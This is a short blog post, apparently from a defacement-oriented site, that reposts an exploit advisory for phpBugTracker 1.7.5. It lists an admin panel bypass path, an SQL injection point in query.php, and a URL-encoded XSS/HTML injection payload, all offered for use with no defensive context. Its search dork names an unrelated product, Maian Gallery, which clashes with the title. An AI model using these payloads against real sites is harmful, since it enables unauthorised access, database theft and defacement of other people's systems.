Pages

Tuesday, 26 May 2015

deface phpBugTracker 1.7.5 Mulllti Vulnerability

 # Title    : phpBugTracker 1.7.5 Mulllti Vulnerability

 # Author   : indoushka

 # email    : indoushka4ever@gmail.com

 # Dork     : Maian Gallery v2.0. Copyright © 2006-2015 Maian Script World. All Rights Reserved

 # Tested on: Win 8.1 fr pro / 22:15 * 15/05/2015

 # Bug      : Mulllti

 # Download : https://github.com/a-v-k/phpBugTracker
 
By Pass Admin Panel :



http://127.0.0.1/phpBugTracker/admin/configure.php



SQL injection :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=1 ( inject her )



( XSS / HTML Inject ) :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=3%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E 

1 comment: